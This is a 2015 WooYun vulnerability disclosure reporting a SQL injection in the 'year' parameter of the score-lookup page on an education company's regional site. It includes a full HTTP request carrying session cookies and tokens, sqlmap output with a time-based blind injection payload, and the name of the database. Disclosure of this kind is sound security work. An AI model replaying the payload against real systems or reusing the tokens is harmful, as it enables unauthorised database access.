当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125250

漏洞标题:学而思培优分站存在SQL注入漏洞

相关厂商:好未来集团学而思培优

漏洞作者: missy

提交时间:2015-07-08 11:22

修复时间:2015-08-23 19:18

公开时间:2015-08-23 19:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-08: 细节已通知厂商并且等待厂商处理中
2015-07-09: 厂商已经确认,细节仅向厂商公开
2015-07-19: 细节向核心白帽子及相关领域专家公开
2015-07-29: 细节向普通白帽子公开
2015-08-08: 细节向实习白帽子公开
2015-08-23: 细节向公众公开

简要描述:

详细说明:

注入:
POST /Students/getScore/ HTTP/1.1
Host: zz.speiyou.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://zz.speiyou.com/Students/getScore/
Cookie: CAKEPHP=jv6johj4hvkejopht9u1qfema0; lastact=http%3A%2F%2Fzz.speiyou.com%2FUsers%2FcompleteInfo%2F; BIGipServerPY_Web-YouHua_Pool=1846257856.20480.0000; jfs=http%3A%2F%2Fzz.speiyou.com%2Fhomes%3Ftk%3DZUdWekxXVm5aakZtWm5NeWIyeDJZbXc0T0hCak9HNTFNek15TUhJMQ; Hm_lvt_7140e3d0654bb622b1e162589f9e278c=1436275347; Hm_lpvt_7140e3d0654bb622b1e162589f9e278c=1436276354; XESCAS[tk]=ZUdWekxXVm5aakZtWm5NeWIyeDJZbXc0T0hCak9HNTFNek15TUhJMQ; stoken=ZUdWekxXVm5aakZtWm5NeWIyeDJZbXc0T0hCak9HNTFNek15TUhJMQ; CakeCookie[XESCAS][Cas]=W%19%D8Xth%E6q%B3%A4%90E%1D%80%B5%07%18%17%2C%94C%AD%60%10%C7s%E9%E6%22%AB%1B%24yC%F9%28%27%F8%16%8F%85R%FC%CF%E4%DDM+%F1%0D%D7h+%D0%D46%2A%82%E0%CAI%E84%FF%EAF%BC%16%28_%92p%8D%CA%0B%14%23%E9dX%0B%B5%17%A1%F3%8D%93%8B%C1g%9BmG%7C%97%16%CE%DE_%8FG%FAi5%7B%B0%22%98%3FV_%B7%C4%07R%D5%C6cb%5Cz%94e%08%D2%10%40%16%8D%0B%F8u%26%1C%92%AE%A7%ED%DE%3B%18%8D%E0d; newstoken=ZUdWekxXVm5aakZtWm5NeWIyeDJZbXc0T0hCak9HNTFNek15TUhJMQ; __utma=190819817.287472353.1436276128.1436276128.1436276128.1; __utmb=190819817.2.10.1436276128; __utmc=190819817; __utmz=190819817.1436276128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; Hm_lvt_b0a8166882e17ab0eb76cbb036d7ffd8=1436276128; Hm_lpvt_b0a8166882e17ab0eb76cbb036d7ffd8=1436276130; indexGradeType=gaozhong; indexGrade=10; indexSubject=ff80808127d77caa0127d7e10f1c00c4; looyu_id=5d3a668cd242b8126a2601c28d8eb1e256_31691%3A1; B_cookie_login_status=ok
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 78
year=2015&grade=&subject=&recommend=1&paperName=1111&button=%E6%9F%A5%E8%AF%A2


参数:year


1.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: year (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: year=2015' AND (SELECT * FROM (SELECT(SLEEP(5)))UNfm) AND 'rYiJ'='rYiJ&grade=&subject=&recommend=1&paperName=1111&button=%E6%9F%A5%E8%AF%A2
---
back-end DBMS: MySQL 5.0.12
current database:    'py_rxcs'

漏洞证明:

修复方案:

过滤相关参数

版权声明:转载请注明来源 missy@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-07-09 19:17

厂商回复:

谢谢,正在修复中

最新状态:

暂无